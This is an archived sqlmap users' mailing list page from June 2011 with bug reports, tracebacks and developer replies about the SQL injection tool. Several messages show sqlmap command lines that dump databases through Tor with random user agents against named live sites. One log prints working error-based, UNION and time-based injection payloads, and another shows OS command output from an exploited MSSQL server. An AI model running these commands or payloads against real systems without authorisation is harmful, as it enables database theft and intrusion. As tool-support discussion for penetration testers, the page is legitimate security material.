sqlmap-users Mailing List for sqlmap (Page 91)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: <bu...@gm...> - 2011-06-15 23:10:58
|
Ryan Sears wrote: > There's a few different options that I basically ALWAYS use What about setting up an alias? alias sqlmap='sqlmap --z "ra,le=5,ri=3..."' |
|
From: Ryan S. <rd...@mt...> - 2011-06-15 22:37:30
|
Nice! That seems like a nifty feature for sure! I'm also a bit confused on the config files, maybe you can clarify? Even when I specify -C sqlmap.conf it doesn't seem to be honoring the options I have set. There's a few different options that I basically ALWAYS use, and it'd be nice to have it just permanently turn on things like --random-agent, as well as risk/level parameters as well. Who knows, I could just be missing something... Also I noticed that no matter how many threads you specify (<3) it sticks it to 3 no matter what, anyone else noticing it? Thanks, and as always great work guys :-D Ryan ----- Original Message ----- From: "Miroslav Stampar" <mir...@gm...> To: "SqlMap List" <sql...@li...> Sent: Wednesday, June 15, 2011 7:55:45 AM GMT -05:00 US/Canada Eastern Subject: [sqlmap-users] New feature: mnemonics Hi boys and girls. We are introducing new (experimental) feature called mnemonics (-z option). All of you who are a hard core users of sqlmap and/or you are tired of writing down long sausages in sqlmap's command line you could enjoy this one. Comparison: A) normal ./sqlmap.py --batch --banner --dump -D=testdb -T=users --technique=E -u="http://xxx.xxx.xxx.xxx/sqlmap/mysql/get_int.php?id=1" B1) with mnemonics ./sqlmap.py -u "http://xxx.xxx.xxx.xxx/sqlmap/mysql/get_int.php?id=1" -z "bat,ban,du,D=testdb,T=users,tec=E" B2) with mnemonics ./sqlmap.py -u "http://xxx.xxx.xxx.xxx/sqlmap/mysql/get_int.php?id=1" --batch --dump -z "ban,D=testdb,T=users,tec=E" C) possible real life example: ./sqlmap.py -u "http://.....?id=1" -z "bat,ban,to,ra,le=3,ri=3" instead of: ./sqlmap.py -u "http://.....?id=1" --batch --banner --tor --random-agent --level=3 --risk=3 (one of many possible equivalents is e.g.: ./sqlmap.py -u "http://.....?id=1" -z "bat,bann,tor,rand,lev=3,ri=3") Trick is that you are writing as shorter names as possible of wanted parameters. Mnemonics are splitted with ',' char and values are explicitly set (if needed) by writing equation mark. In case of ambiguities parameter with the shortest name will be used (e.g. du will be resolved to dump because dump is shorter than dump-all) This is all prone to changes and we are opened for suggestions. KR -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B ------------------------------------------------------------------------------ EditLive Enterprise is the world's most technically advanced content authoring tool. Experience the power of Track Changes, Inline Image Editing and ensure content is compliant with Accessibility Checking. http://p.sf.net/sfu/ephox-dev2dev _______________________________________________ sqlmap-users mailing list sql...@li... https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: Joseph S. <jos...@gm...> - 2011-06-15 19:40:23
|
I keep getting this error when trying to update.
sqlmap version: 0.9 (r3630)
Python version: 2.6.5
Operating system: posix
Command line: sqlmap.py --update
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
File "sqlmap.py", line 74, in main
dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"),
forceOutput=True)
File "/pentest/database/sqlmap/lib/core/option.py", line 1590, in init
update()
File "/pentest/database/sqlmap/lib/core/update.py", line 71, in update
client.update(rootDir)
ClientError: callback_get_login required
|
|
From: Miroslav S. <mir...@gm...> - 2011-06-15 18:47:32
|
hi Olu. you are right. we haven't noticed, but support for Sybase was seriously limited due to this bug. now you can freely dump tables (no need for -C to explicitly state the columns as --columns was crippled and fixed too) on Sybase. kr On Tue, Jun 14, 2011 at 10:32 PM, Olu Akindeinde <sey...@gm...> wrote: > Hi again, > Why is it sometimes difficult to enumerate columns (-C 'column name') in > sqlmap. I have noticed this especially with column extraction of Sybase > databases. I have tried to extract table columns on at least three Sybase > database backend servers and they all come up short. All other forms of > enumerations work (-D, -T including --columns). I have even tried to run > SELECT statements via the --sql-shell option but it comes up with absolutely > no data. This hardly happens on MySQL or MSSQL. The error i keep getting is > > [WARNING] unable to enumerate the columns for table 'TABLE' on database > 'DB', skipping > [INFO] you can find results of scanning in multiple targets mode inside the > CSV file '/Users/fx/sqlmap/output/results-06142011_0635pm.csv' > > I'm I getting something wrong? > Thanks again for a truly capable tool. > Olu > > ------------------------------------------------------------------------------ > EditLive Enterprise is the world's most technically advanced content > authoring tool. Experience the power of Track Changes, Inline Image > Editing and ensure content is compliant with Accessibility Checking. > http://p.sf.net/sfu/ephox-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Miroslav S. <mir...@gm...> - 2011-06-15 11:55:52
|
Hi boys and girls. We are introducing new (experimental) feature called mnemonics (-z option). All of you who are a hard core users of sqlmap and/or you are tired of writing down long sausages in sqlmap's command line you could enjoy this one. Comparison: A) normal ./sqlmap.py --batch --banner --dump -D=testdb -T=users --technique=E -u="http://xxx.xxx.xxx.xxx/sqlmap/mysql/get_int.php?id=1" B1) with mnemonics ./sqlmap.py -u "http://xxx.xxx.xxx.xxx/sqlmap/mysql/get_int.php?id=1" -z "bat,ban,du,D=testdb,T=users,tec=E" B2) with mnemonics ./sqlmap.py -u "http://xxx.xxx.xxx.xxx/sqlmap/mysql/get_int.php?id=1" --batch --dump -z "ban,D=testdb,T=users,tec=E" C) possible real life example: ./sqlmap.py -u "http://.....?id=1" -z "bat,ban,to,ra,le=3,ri=3" instead of: ./sqlmap.py -u "http://.....?id=1" --batch --banner --tor --random-agent --level=3 --risk=3 (one of many possible equivalents is e.g.: ./sqlmap.py -u "http://.....?id=1" -z "bat,bann,tor,rand,lev=3,ri=3") Trick is that you are writing as shorter names as possible of wanted parameters. Mnemonics are splitted with ',' char and values are explicitly set (if needed) by writing equation mark. In case of ambiguities parameter with the shortest name will be used (e.g. du will be resolved to dump because dump is shorter than dump-all) This is all prone to changes and we are opened for suggestions. KR -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Olu A. <sey...@gm...> - 2011-06-14 20:32:45
|
Hi again, Why is it sometimes difficult to enumerate columns (-C 'column name') in sqlmap. I have noticed this especially with column extraction of Sybase databases. I have tried to extract table columns on at least three Sybase database backend servers and they all come up short. All other forms of enumerations work (-D, -T including --columns). I have even tried to run SELECT statements via the --sql-shell option but it comes up with absolutely no data. This hardly happens on MySQL or MSSQL. The error i keep getting is [WARNING] unable to enumerate the columns for table 'TABLE' on database 'DB', skipping [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/Users/fx/sqlmap/output/results-06142011_0635pm.csv' I'm I getting something wrong? Thanks again for a truly capable tool. Olu |
|
From: Miroslav S. <mir...@gm...> - 2011-06-14 08:38:04
|
hi Olu. thank you for your report and find it fixed in the latest commit. nevertheless, if you experience some more problems while retrieving data you can freely contact me privately with some more details. kr On Tue, Jun 14, 2011 at 9:24 AM, Olu Akindeinde <sey...@gm...> wrote: > > Hi, > Sqlmap gave this critical error > Thanks >> >> sqlmap version: 1.0-dev (r4077) >> Python version: 2.6.1 >> Operating system: posix >> Command line: ./sqlmap.py -u http://www.abc.com/rp.jsp?uname= --thread=10 >> -v 3 --dump -D database -T table --parse-errors --fresh-queries >> Technique: TIME >> Back-end DBMS: Sybase (fingerprinted) >> Traceback (most recent call last): >> File "./sqlmap.py", line 85, in main >> start() >> File "/Users/fx/sqlmap/lib/controller/controller.py", line 541, in start >> action() >> File "/Users/fx/sqlmap/lib/controller/action.py", line 109, in action >> conf.dbmsHandler.dumpTable() >> File "/Users/fx/sqlmap/plugins/generic/enumeration.py", line 1479, in >> dumpTable >> self.getColumns(onlyColNames=True) >> File "/Users/fx/sqlmap/plugins/dbms/sybase/enumeration.py", line 220, in >> getColumns >> columns[name] = sybaseTypes[type_] if type_ else None >> KeyError: u'A' >> > > > ------------------------------------------------------------------------------ > EditLive Enterprise is the world's most technically advanced content > authoring tool. Experience the power of Track Changes, Inline Image > Editing and ensure content is compliant with Accessibility Checking. > http://p.sf.net/sfu/ephox-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Olu A. <sey...@gm...> - 2011-06-14 07:24:36
|
Hi, Sqlmap gave this critical error Thanks > > > sqlmap version: 1.0-dev (r4077) > Python version: 2.6.1 > Operating system: posix > Command line: ./sqlmap.py -u http://www.abc.com/rp.jsp?uname= --thread=10 > -v 3 --dump -D database -T table --parse-errors --fresh-queries > Technique: TIME > Back-end DBMS: Sybase (fingerprinted) > Traceback (most recent call last): > File "./sqlmap.py", line 85, in main > start() > File "/Users/fx/sqlmap/lib/controller/controller.py", line 541, in start > action() > File "/Users/fx/sqlmap/lib/controller/action.py", line 109, in action > conf.dbmsHandler.dumpTable() > File "/Users/fx/sqlmap/plugins/generic/enumeration.py", line 1479, in > dumpTable > self.getColumns(onlyColNames=True) > File "/Users/fx/sqlmap/plugins/dbms/sybase/enumeration.py", line 220, in > getColumns > columns[name] = sybaseTypes[type_] if type_ else None > KeyError: u'A' > > > |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-06-13 18:43:57
|
It's the dumbest article on SQL injection ever. There's nothing that deserve a read in there. Unfortunately, I lost those 10 minutes of life. Reasons? 1. The technique is non deterministic. It's not new. It takes way longer than a proper bisection algorithm. 2. A bisection algorithm worked on the ASCII() representation of the SUBSTR() of the query is way better than an heuristic regexp "guess". 3. The examples in the paper are actually weak and refer to very outdated techniques to do time-based - They explain BENCHMARK() for MySQL where since 5.0.12 there's builtin SLEEP() and do the time-based on MSSQL with heavy queries, where since MSSQL 7.0 or 2000 we have waitfor delay. Bernardo On 13 June 2011 19:37, Andres Riancho <and...@gm...> wrote: > FYI. Would be a nice to have in sqlmap :) > > > ---------- Forwarded message ---------- > From: R00T_ATI <r00...@ih...> > Date: Sun, Jun 12, 2011 at 2:45 PM > Subject: [Full-disclosure] Blind Sql Injection With Regular Expression > To: ful...@li... > > > New and fast attack for blind sql injection. > > http://www.ihteam.net/papers/blind-sqli-regexp-attack.pdf > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > > -- > Andrés Riancho > Director of Web Security at Rapid7 LLC > Founder at Bonsai Information Security > Project Leader at w3af > > ------------------------------------------------------------------------------ > EditLive Enterprise is the world's most technically advanced content > authoring tool. Experience the power of Track Changes, Inline Image > Editing and ensure content is compliant with Accessibility Checking. > http://p.sf.net/sfu/ephox-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
|
From: Andres R. <and...@gm...> - 2011-06-13 18:38:10
|
FYI. Would be a nice to have in sqlmap :) ---------- Forwarded message ---------- From: R00T_ATI <r00...@ih...> Date: Sun, Jun 12, 2011 at 2:45 PM Subject: [Full-disclosure] Blind Sql Injection With Regular Expression To: ful...@li... New and fast attack for blind sql injection. http://www.ihteam.net/papers/blind-sqli-regexp-attack.pdf _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Andrés Riancho Director of Web Security at Rapid7 LLC Founder at Bonsai Information Security Project Leader at w3af |
|
From: Miroslav S. <mir...@gm...> - 2011-06-11 07:52:40
|
hi Kirill. thank you for your report and find it fixed in the latest commit. kr On Sat, Jun 11, 2011 at 9:00 AM, Kirill Morozov <l0...@l0...> wrote: > Hello, > this is not an error, just look :) > Last time when i used "--os-cmd whoami" with mssql, i got: > [11:00:08] [INFO] retrieved: nt authority\\network service\n > command standard output: > --- > nt authority > etwork service > --- > first char was interpreted as new line :) > -- > Kirill Morozov > KIMO2-RIPE, RHCE > > > > ------------------------------------------------------------------------------ > EditLive Enterprise is the world's most technically advanced content > authoring tool. Experience the power of Track Changes, Inline Image > Editing and ensure content is compliant with Accessibility Checking. > http://p.sf.net/sfu/ephox-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Kirill M. <l0...@l0...> - 2011-06-11 07:08:01
|
Hello, this is not an error, just look :) Last time when i used "--os-cmd whoami" with mssql, i got: [11:00:08] [INFO] retrieved: nt authority\\network service\n command standard output: --- nt authority etwork service --- first char was interpreted as new line :) -- Kirill Morozov KIMO2-RIPE, RHCE |
|
From: Miroslav S. <mir...@gm...> - 2011-06-09 19:38:46
|
hi Jeremy. well, Basic and other supported authentications shoud reauthenticate automatically as you already know. web authentication is supported via cookies which you are probably using if i am not mistaken. doing plain web authentication is not supported out of the box because every authentication form has it's own parameters that needs to supplied (not standardized). now, we are opened to the suggestions. we can support this kind of things that you require but we need some generic approach. for example, we could support one more type of authorization where if there is a form with stated parameter names there sqlmap could automatically fill them and send them. kr On Thu, Jun 9, 2011 at 5:19 PM, Jeremy Mendiola <vi...@gm...> wrote: > Hi, > > during my pentests I've found several Blind SQL Injection that could be > exploited just by authenticated users (I obviously mean web authentication > not NTLM/Basic authentication). > In most of these cases, a FALSE boolean response of a sql injection logged > the user off, and I needed re-authenticate to launch the exploit again. Is > there a way to configure sqlmap to re-authenticate automatically in case of > a FALSE response? Some sort of a two step injection (authentication + > injection) in particular cases (eg. FALSE response)? > > Best regards, > > Jeremy > > ------------------------------------------------------------------------------ > EditLive Enterprise is the world's most technically advanced content > authoring tool. Experience the power of Track Changes, Inline Image > Editing and ensure content is compliant with Accessibility Checking. > http://p.sf.net/sfu/ephox-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Jeremy M. <vi...@gm...> - 2011-06-09 15:19:42
|
Hi, during my pentests I've found several Blind SQL Injection that could be exploited just by authenticated users (I obviously mean web authentication not NTLM/Basic authentication). In most of these cases, a FALSE boolean response of a sql injection logged the user off, and I needed re-authenticate to launch the exploit again. Is there a way to configure sqlmap to re-authenticate automatically in case of a FALSE response? Some sort of a two step injection (authentication + injection) in particular cases (eg. FALSE response)? Best regards, Jeremy |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-06-08 23:29:06
|
Fixed now. Thanks for reporting. Bernardo 2011/6/9 Kazım Buğra Tombul <mha...@gm...>: > [02:22:47] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4055), retry > your run with the latest development version from the Subversion repository. > If the exception persists, please send by e-mail to > sql...@li... the following text and any information > required to reproduce the bug. The developers will try to reproduce the bug, > fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r4055) > Python version: 2.7.1 > Operating system: posix > Command line: /Users/Montserrat/sqlmap-dev/sqlmap.py --random-agent -u > http://www.sevginehri.net/sarkisozu.asp?sarki=678 --batch > Technique: UNION > Back-end DBMS: None (identified) > Traceback (most recent call last): > File "/Users/Montserrat/sqlmap-dev/sqlmap.py", line 85, in main > start() > File "/Users/Montserrat/sqlmap-dev/lib/controller/controller.py", line > 444, in start > injection = checkSqlInjection(place, parameter, value) > File "/Users/Montserrat/sqlmap-dev/lib/controller/checks.py", line 402, in > checkSqlInjection > singleTimeWarnMessage(warnMsg, logging.WARN, title) > TypeError: singleTimeWarnMessage() takes exactly 1 argument (3 given) > > Kazım Buğra Tombul > > Senior @ Metu Computer Engineering > Software Developer @ Speeddate.com, Inc. > System Administrator @ Metu Computer Club > Supervisory Board Member @ Metu Computer Club > > > ------------------------------------------------------------------------------ > EditLive Enterprise is the world's most technically advanced content > authoring tool. Experience the power of Track Changes, Inline Image > Editing and ensure content is compliant with Accessibility Checking. > http://p.sf.net/sfu/ephox-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
|
From: Kazım B. T. <mha...@gm...> - 2011-06-08 23:25:29
|
[02:22:47] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4055), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 1.0-dev (r4055) Python version: 2.7.1 Operating system: posix Command line: /Users/Montserrat/sqlmap-dev/sqlmap.py --random-agent -u http://www.sevginehri.net/sarkisozu.asp?sarki=678 --batch Technique: UNION Back-end DBMS: None (identified) Traceback (most recent call last): File "/Users/Montserrat/sqlmap-dev/sqlmap.py", line 85, in main start() File "/Users/Montserrat/sqlmap-dev/lib/controller/controller.py", line 444, in start injection = checkSqlInjection(place, parameter, value) File "/Users/Montserrat/sqlmap-dev/lib/controller/checks.py", line 402, in checkSqlInjection singleTimeWarnMessage(warnMsg, logging.WARN, title) TypeError: singleTimeWarnMessage() takes exactly 1 argument (3 given) *Kazım Buğra Tombul* *Senior @ Metu Computer Engineering* *Software Developer @ Speeddate.com, Inc.* *System Administrator @ Metu Computer Club* *Supervisory Board Member @ Metu Computer Club* |
|
From: Miroslav S. <mir...@gm...> - 2011-06-07 21:50:29
|
p.s. i can see that that web site is not very responsive. maybe somehow connected to "cenzic 232" On Tue, Jun 7, 2011 at 11:43 PM, Miroslav Stampar <mir...@gm...> wrote: > hi Chris. > > thank you for your report and find it fixed in the latest commit. > > kr > > On Tue, Jun 7, 2011 at 10:11 PM, Chris Clements <ccl...@fl...> wrote: >> [14:33:41] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is going to retry the request >> [14:34:20] [CRITICAL] connection timed out to the target url or proxy, >> sqlmap is going to retry the request >> [14:34:51] [CRITICAL] connection timed out to the target url or proxy, >> sqlmap is going to retry the request >> [14:34:52] [CRITICAL] unable to connect to the target url or proxy >> [14:34:52] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4033), retry >> your run with the latest development version from the Subversion repository. >> If the exception persists, please send by e-mail >> to sql...@li... the following text and any information >> required to reproduce the bug. The developers will try to reproduce the bug, >> fix it accordingly and get back to you. >> sqlmap version: 1.0-dev (r4033) >> Python version: 2.6.1 >> Operating system: posix >> Command line: ./sqlmap.py --forms --batch --risk 3 --level 5 -o --threads 5 >> -u http://crackme.cenzic.com/Kelev/register/register.php >> Technique: UNION >> Back-end DBMS: None (identified) >> Traceback (most recent call last): >> File "./sqlmap.py", line 86, in main >> start() >> File "/private/var/root/sqlmap/lib/controller/controller.py", line 447, in >> start >> injection = checkSqlInjection(place, parameter, value) >> File "/private/var/root/sqlmap/lib/controller/checks.py", line 335, in >> checkSqlInjection >> falseResult = Request.queryPage(genCmpPayload(), place, raise404=False) >> File "/private/var/root/sqlmap/lib/request/connect.py", line 581, in >> queryPage >> elif kb.nullConnection == NULLCONNECTION.RANGE and >> HTTPHEADER.CONTENT_RANGE in headers: >> TypeError: argument of type 'NoneType' is not iterable >> [*] shutting down at: 14:34:52 >> –––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––– >> Chris Clements Security Architect >> Flat Earth Networking, Inc. 24-Hour Technical Support Line 800-329-0408 >> All we do is computer network security. P: (615) 336-6296 | F: (615) >> 296-4101 >> >> ------------------------------------------------------------------------------ >> EditLive Enterprise is the world's most technically advanced content >> authoring tool. Experience the power of Track Changes, Inline Image >> Editing and ensure content is compliant with Accessibility Checking. >> http://p.sf.net/sfu/ephox-dev2dev >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Miroslav S. <mir...@gm...> - 2011-06-07 21:43:13
|
hi Chris. thank you for your report and find it fixed in the latest commit. kr On Tue, Jun 7, 2011 at 10:11 PM, Chris Clements <ccl...@fl...> wrote: > [14:33:41] [CRITICAL] unable to connect to the target url or proxy, sqlmap > is going to retry the request > [14:34:20] [CRITICAL] connection timed out to the target url or proxy, > sqlmap is going to retry the request > [14:34:51] [CRITICAL] connection timed out to the target url or proxy, > sqlmap is going to retry the request > [14:34:52] [CRITICAL] unable to connect to the target url or proxy > [14:34:52] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4033), retry > your run with the latest development version from the Subversion repository. > If the exception persists, please send by e-mail > to sql...@li... the following text and any information > required to reproduce the bug. The developers will try to reproduce the bug, > fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r4033) > Python version: 2.6.1 > Operating system: posix > Command line: ./sqlmap.py --forms --batch --risk 3 --level 5 -o --threads 5 > -u http://crackme.cenzic.com/Kelev/register/register.php > Technique: UNION > Back-end DBMS: None (identified) > Traceback (most recent call last): > File "./sqlmap.py", line 86, in main > start() > File "/private/var/root/sqlmap/lib/controller/controller.py", line 447, in > start > injection = checkSqlInjection(place, parameter, value) > File "/private/var/root/sqlmap/lib/controller/checks.py", line 335, in > checkSqlInjection > falseResult = Request.queryPage(genCmpPayload(), place, raise404=False) > File "/private/var/root/sqlmap/lib/request/connect.py", line 581, in > queryPage > elif kb.nullConnection == NULLCONNECTION.RANGE and > HTTPHEADER.CONTENT_RANGE in headers: > TypeError: argument of type 'NoneType' is not iterable > [*] shutting down at: 14:34:52 > –––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––– > Chris Clements Security Architect > Flat Earth Networking, Inc. 24-Hour Technical Support Line 800-329-0408 > All we do is computer network security. P: (615) 336-6296 | F: (615) > 296-4101 > > ------------------------------------------------------------------------------ > EditLive Enterprise is the world's most technically advanced content > authoring tool. Experience the power of Track Changes, Inline Image > Editing and ensure content is compliant with Accessibility Checking. > http://p.sf.net/sfu/ephox-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Chris C. <ccl...@fl...> - 2011-06-07 20:38:06
|
[14:33:41] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request [14:34:20] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request [14:34:51] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request [14:34:52] [CRITICAL] unable to connect to the target url or proxy [14:34:52] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4033), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 1.0-dev (r4033) Python version: 2.6.1 Operating system: posix Command line: ./sqlmap.py --forms --batch --risk 3 --level 5 -o --threads 5 -u http://crackme.cenzic.com/Kelev/register/register.php Technique: UNION Back-end DBMS: None (identified) Traceback (most recent call last): File "./sqlmap.py", line 86, in main start() File "/private/var/root/sqlmap/lib/controller/controller.py", line 447, in start injection = checkSqlInjection(place, parameter, value) File "/private/var/root/sqlmap/lib/controller/checks.py", line 335, in checkSqlInjection falseResult = Request.queryPage(genCmpPayload(), place, raise404=False) File "/private/var/root/sqlmap/lib/request/connect.py", line 581, in queryPage elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers: TypeError: argument of type 'NoneType' is not iterable [*] shutting down at: 14:34:52 Chris Clements Security Architect Flat Earth Networking, Inc. 24-Hour Technical Support Line 800-329-0408 All we do is computer network security. P: (615) 336-6296 | F: (615) 296-4101 |
|
From: Miroslav S. <mir...@gm...> - 2011-06-07 17:13:56
|
hi nightman and everybody else. this was a really nasty bug which prevented proper handling of dumped data after Ctrl+C was pressed. this should be fixed with the last commit (r4034). kr On Sun, Jun 5, 2011 at 4:12 PM, <nig...@em...> wrote: > Hy > > I have a problem with data dumping. > > When i run this sqlmap -u "http://website.com/vuln.php" --cookie="cookies" --random-agent --retries=6 --level 5 --risk 3 --dump -D database -T table > > Place: GET > Parameter: id > Type: error-based > Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause > Payload: section=502&action=view_all_albums&id=83389 AND (SELECT 8070 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,115,109,58),(SELECT (CASE WHEN (8070=8070) THEN 1 ELSE 0 END)),CHAR(58,103,103,97,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) > > Type: UNION query > Title: MySQL UNION query (NULL) - 11 to 20 columns > Payload: section=502&action=view_all_albums&id=-5690 UNION ALL SELECT NULL, CONCAT(CHAR(58,106,115,109,58),IFNULL(CAST(CHAR(82,121,113,115,106,81,100,117,77,99) AS CHAR),CHAR(32)),CHAR(58,103,103,97,58)), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# > > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 AND time-based blind > Payload: section=502&action=view_all_albums&id=83389 AND SLEEP(5 > > sqlmap runs normal shows me the data. Now the Problem when i break up in the middle of dumping sqlmap don´t save the already received data in a csv only the first received data from the DB found in the csv. > > if I wait to sqlmap finished the dumping, is all ok and i find all data in the csv. In an earlier version of sqlmap the data from a stoped dumping still found in the csv. > > PS i know my english is terrible. But i hope you understand my problem. ;) > > ------------------------------------------------------------------------------ > Simplify data backup and recovery for your virtual environment with vRanger. > Installation's a snap, and flexible recovery options mean your data is safe, > secure and there when you need it. Discover what all the cheering's about. > Get your free trial download today. > http://p.sf.net/sfu/quest-dev2dev2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Miroslav S. <mir...@gm...> - 2011-06-07 10:30:56
|
hi again. from now on threads shouldn't cause this kind of mess. with the last commit they are going to be silently killed - in your case that would mean that they'll just handle the bandwidth to others. kr On Tue, Jun 7, 2011 at 8:00 AM, Miroslav Stampar <mir...@gm...> wrote: > hi nightman. > > well, it's not really a bug: > "[04:53:24] [WARNING] if the problem persists please try to lower the > number of used threads (--threads)" > > i know that you've already used low number of threads (3) but it seems > that you have some connection issues with your host. so, i am not sure > how we could help :) > > kr > > On Tue, Jun 7, 2011 at 5:21 AM, <nig...@em...> wrote: >> This Bug is from my laptops sqlmap with python 2.7 The other problem is on >> another PC with still python 2.6 ;) >> >> sqlmap -u "http://website.com/feed.php?s=os&p=48693" --random-agent >> --retries=6 --level 5 --risk 3 --common-tables -D Database >> >> Place: GET >> Parameter: s >> Type: boolean-based blind >> Title: AND boolean-based blind - WHERE or HAVING clause >> Payload: s=os' AND 611=611 AND 